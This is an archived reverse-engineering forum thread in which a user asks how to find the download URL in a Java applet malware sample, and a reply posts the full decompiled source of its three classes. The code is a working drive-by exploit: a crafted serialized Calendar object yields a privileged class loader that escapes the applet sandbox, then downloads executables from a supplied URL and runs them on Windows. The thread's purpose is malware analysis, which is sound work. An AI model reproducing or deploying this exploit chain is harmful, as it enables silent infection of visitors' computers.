Log in

View Full Version : JAVA malware

BATMAN
February 28th, 2010, 04:58
How can I get a malicious link from java malware?I use Java Decompiler, but I haven't find a link.....Please help (I'm not strong in JAVA)
Here JAVA MALWARE
pass infected

P.S.Sorry for rules....
Silkut
February 28th, 2010, 06:51
Hi,

So I guess you decompiled the Java class and found out the strings were either encrypted and concatened/appended all together.
It is also clear that it is dropping an exe with a name randomly generated.

You could try to hack the code to get it running and retrieve the url while sniffing, you could also sort every strings and manually process every manipulation.

MALICIOUS CODE

PX.class
Code:
/ Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov  Date: 28/02/2010 12:43:59

// Home Page : http://members.fortunecity.com/neshkov/dj.html  - Check often for new version!

// Decompiler options: packimports(3) 

// Source File Name:   PX.java



package myf.y;



import java.io.*;

import java.net.URL;

import java.security.AccessController;

import java.security.PrivilegedExceptionAction;



public class PX

    implements PrivilegedExceptionAction

{



    public static byte[] StringToBytes(String s)

    {

        byte abyte0[] = new byte[s.length() / 2];

        String s1 = "sdjffjjjjjjjjjjsdfsduuuujf8ds";

        for(int i = 0; i < s.length(); i += 2)

            abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));



        return abyte0;

    }



    public Object run()

        throws Exception

    {

        if(data == null)

            return null;

        try

        {

            String s = "os.name";

            String s1 = "00057372001B6A6176612E7574696C2E477265676F7";

            String s2 = "Windows";

            String s3 = System.getProperty(s);

            String s4 = "00057372001B6A6176612E7574696C2E477265676Fasd7";

            if(s3.indexOf(s2) >= 0)

            {

                int i = 1;

                if(cc != null)

                    i = Integer.parseInt(cc);

                for(int j = 0; j < i; j++)

                {

                    URL url = new URL((new StringBuilder()).append(data).append(Integer.toString(j)).toString());

                    url.openConnection();

                    InputStream inputstream = url.openStream();

                    String s5 = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D704900157365726961 6C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A 4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";

                    String s6 = (new StringBuilder()).append(System.getProperty("java.io.tmpdir").append(File.separator).append(Math.random()).append(".exe".toString();

                    FileOutputStream fileoutputstream = new FileOutputStream(s6);

                    int k;

                    int l;

                    for(l = 0; (k = inputstream.read()) != -1; l++)

                        fileoutputstream.write(k);



                    inputstream.close();

                    fileoutputstream.close();

                    String s7 = "6E69656E744900166D696E696D616C44617973496E    46697273745765656B4900096E6578745374616D704   9001573657269616C56657273696F6E4F6E53747265   616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176 612F7574696C2F54696D655A6";

                    if(l >= 1024)

                        Runtime.getRuntime().exec(s6);

                }



            }

        }

        catch(Exception exception) { }

        return null;

    }



    public PX()

    {

        try

        {

            AccessController.doPrivileged(this);

        }

        catch(Exception exception) { }

    }



    public static String data = null;

    public static String cc = null;



}


LoaderX.class
Code:
// Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov  Date: 28/02/2010 12:35:03

// Home Page : http://members.fortunecity.com/neshkov/dj.html  - Check often for new version!

// Decompiler options: packimports(3) 

// Source File Name:   LoaderX.java



package myf.y;



import java.io.*;

import java.lang.reflect.Field;

import java.net.URL;

import java.security.*;

import java.security.cert.Certificate;



public class LoaderX extends ClassLoader

    implements Serializable

{



    public LoaderX()

    {

    }



    private void writeObject(ObjectOutputStream objectoutputstream)

        throws IOException, ClassNotFoundException

    {

        objectoutputstream.defaultWriteObject();

    }



    private void readObject(ObjectInputStream objectinputstream)

        throws IOException, ClassNotFoundException

    {

        instance = this;

        objectinputstream.defaultReadObject();

    }



    public void bootstrapPayload(String s, String s1)

        throws IOException

    {

        Object obj = null;

        try

        {

            ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();

            byte abyte0[] = new byte[8192];

            InputStream inputstream = getClass().getResourceAsStream("/myf/y/PX.class";

            String s2 = "6E69656E744900166D696E696D616C446179734  96E46697273745765656B4900096E657874537461  6D7049001573657269616C56657273696F6E4F6E53  747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C 6A6176612F7574696C2F54696D655A6";

            int i;

            while((i = inputstream.read(abyte0)) > 0) 

                bytearrayoutputstream.write(abyte0, 0, i);

            abyte0 = bytearrayoutputstream.toByteArray();

            URL url = new URL("file:///"; // strange url innit ?

            Certificate acertificate[] = new Certificate[0];

            Permissions permissions = new Permissions();

            permissions.add(new AllPermission());

            ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(url, acertificate), permissions);

            Class class1 = defineClass("myf.y.PX", abyte0, 0, abyte0.length, protectiondomain);

            if(class1 != null)

            {

                Field field = class1.getField("data";

                Field field1 = class1.getField("cc";

                Object obj1 = class1.newInstance();

                field.set(obj1, s);

                field1.set(obj1, s1);

                obj1 = class1.newInstance();

            }

        }

        catch(Exception exception) { }

    }



    private static final long serialVersionUID = 0x5e8b4c67ddc409d8L;

    public static LoaderX instance = null;



}


AppletX.class
Code:
// Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov  Date: 28/02/2010 12:44:49

// Home Page : http://members.fortunecity.com/neshkov/dj.html  - Check often for new version!

// Decompiler options: packimports(3) 

// Source File Name:   AppletX.java



package myf.y;



import java.applet.Applet;

import java.io.ByteArrayInputStream;

import java.io.ObjectInputStream;



// Referenced classes of package myf.y:

//            PX, LoaderX



public class AppletX extends Applet

{



    public AppletX()

    {

        serializedObject = (new StringBuilder()).append("ACED".append(ff).append("269616E".append(a34).append("00A".toString();

    }



    public void init()

    {

        try

        {

            String s = "000000";

            String s1 = "5469";

            String s2 = (new StringBuilder()).append("0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E0300 0B5A000C6172654669656C647353657449000E66697273744461794F665765656B5A00096973".append(s1).append("6D655365745A00076C656E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E657874537461 6D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B0005 69735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F".append(s1).append("6D655A6F6E653B787001".append(s).append("010101".append(s).append("01".append(s).append("02".append(s).append("0100000121563A".toString();

            String s3 = (new StringBuilder()).append("200014A".append(s2).append("FC0E757200025B494DBA602676EAB2A5020000787".append(s).append("011".append(s).append("01000007D9".append(s).append("04".append(s).append("15".append(s).append("04".append(s).append("12".append(s).append("8A".append(s).append("02".append(s).append("03".append(s).append("01".append(s).append("04".append(s).append("1".append(s).append("011".append(s).append("22000002DEFE488C".append(s).append("0000757200025B5A578F203914B85DE2020000787".append(s).append("0110101010101010".toString();

            String s4 = (new StringBuilder()).append("6444617949000C656E644461794F665765656B490007656E644D6F6465490008656E644D6F6E7468490007656E64".append(s1).append("6D6549000B656E64".append(s1).append("6D654D6F64654900097261774F666673657449001573657269616C56657273696F6E4F6E53747265616D4900087374617274 44617949000E73746172744461794F665765656B49000973746172744D6F646549000A73746172744D6F6E74684900097374 617274".append(s1).append("6D6549000D7374617274".append(s1).append("6D654D6F64654900097374617274596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B 42787200126A6176612E7574696C2E".append(s1).append("6D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E416D 65726963612F446177736F6E0036EE8".append(s).append("000000000".append(s).append("000000".append(s).append("000000".append(s).append("0000FE4".toString();

            ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(PX.StringToBytes((new StringBuilder()).append("ACED00057372001B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7D6E5B0D0C10".append(s3).append("101010101010101010101737200186A6176612E7574696C2E53696D706C65".append(s1).append("6D655A6F6E65FA675D60D15EF5A603001249000A647374536176696E6773490006656E".append(s4).append("88C".append(s).append("0002".append(s).append("000000".append(s).append("000000".append(s).append("000000".append(s).append("000000".append(s).append("0000757200025B42ACF317F8060854E0020000787".append(s).append("00C1F1C1F1E1F1E1F1F1E1F1E1F770A".append(s).append("06".append(s).append("0000007571007E0006".append(s).append("02".append(s).append("0000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E2F964AC000A".toString())));

            Object obj = objectinputstream.readObject();

            if(obj != null && LoaderX.instance != null)

            {

                String s5 = getParameter("data";

                String s6 = getParameter("cc";

                if(s5 == null)

                    s5 = "";

                LoaderX.instance.bootstrapPayload(s5, s6);

            }

        }

        catch(Exception exception) { }

    }



    private static final long serialVersionUID = 0xd30f41af207ff1c8L;

    private static String ff = "00057372001B6A6176612E7574696C2E477265676F7";

    private static String as;

    private static String afc;

    private static String afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha;

    private static String afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha;

    private static String lol;

    private static String kol;

    private static String gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj;

    private static String kkk;

    private static String asa;

    private static String abc;

    private static String a5 = "sdfsd fsdf hsd fkjw fekwe gfrjkg kj54 tkj nkj4 609hyi9h0009e433333333333333333333333333333333333349tugreo9ug 9rugjjjjjjj9 woiuwwwwwwwwwwwwwwwwwwuqrfj 29fu 09epwoooooooooog poreig iorehg oia;sjhdfiosjgf dhhhhhhhhhhhhh";

    private static String klls;

    private static String a1;

    private static String a2;

    private static String a31;

    private static String a32;

    private static String a33;

    public static String a34;

    private final String serializedObject;

    public static String data = null;



    static 

    {

        as = "00000";

        afc = "44461794";

        afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha = "646549000";

        afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D704900157365726961 6C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A 4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";

        lol = "73657269616C56657273696F6E4F6E53747265616D4900087";

        kol = "6F6E7468490007656E6454696D6549000B656E6454696D6";

        gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj = "4596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696 C2E54696D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B7870740 00E4";

        kkk = "2744D6F6E7468490009737461727454696D6549000D7374617";

        asa = "010101010101010101737200186A6176612E7574696C2E53696D706C6554696D655A6F6E65FA675D60D15EF5A60300124900 0A64737453";

        abc = "B0D0C10200014A0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D 1EC8DC5B8E03000B5A000C6172654669656C647353657449";

        klls = (new StringBuilder()).append("87001".append(as).append("0010101".append(as).append("001".append(as).append("002".append(as).append("001".append(as).append("121563AFC0E757200025B494DBA602676EAB2A5020000787".append(as).append("0011".append(as).append("001".append(as).append("7D9".append(as).append("004".append(as).append("015".append(as).append("004".append(as).append("012".append(as).append("08A".append(as).append("002".append(as).append("003".append(as).append("001".append(as).append("004".append(as).append("01".append(as).append("0011".append(as).append("022".append(as).append("2DEFE488C".append(as).append("00000757200025B5A578F203914B85DE2020000787".append(as).append("00110101010101010101".append(asa).append("6176696E6773490006656E6".append(afc).append("9000C656E6".append(afc).append("F665765656B490007656E644D6F".append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("8656E644D".append(kol).append("54D6F".append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("97261774F6666736574490015".append(lol).append("37461727".append(afc).append("9000E737461727".append(afc).append("F665765656B49000973746172744D6F".append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("A73".toString();

        a1 = (new StringBuilder()).append("0007571007E0006".append(as).append("002".append(as).append("00000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E".toString();

        a2 = (new StringBuilder()).append("61727".append(gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj).append("16D65726963612F446177736F6E0036EE8".append(as).append("00000".append(as).append("00000".append(as).append("00000".append(as).append("00000".append(as).append("0000FE488C0000000002".append(as).append("00000".append(as).append("00000".append(as).append("00000".append(as).append("00000".append(as).append("00000".append(as).append("000757200025B42ACF317F8060854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1F770A".append(as).append("006".append(as).append("0000".append(a1).append("2F96".toString();

        a31 = (new StringBuilder()).append("9697354696D655365745A00076C65".append(afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha).append("F6E6".toString();

        a32 = (new StringBuilder()).append("000".append(a31).append("53B7".append(klls).append("74617".append(kkk).append("27454696D654D6F".append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("97374".append(a2).append("4A".toString();

        a33 = (new StringBuilder()).append("C656E6461728F3DD7D6E5".append(abc).append("000E666972737".append(afc).append("F665".toString();

        a34 = (new StringBuilder()).append("43616".append(a33).append("765656B5A".append(a32).append("C0".toString();

    }

}
BATMAN
March 2nd, 2010, 10:08
Maybe there is the way to debug it?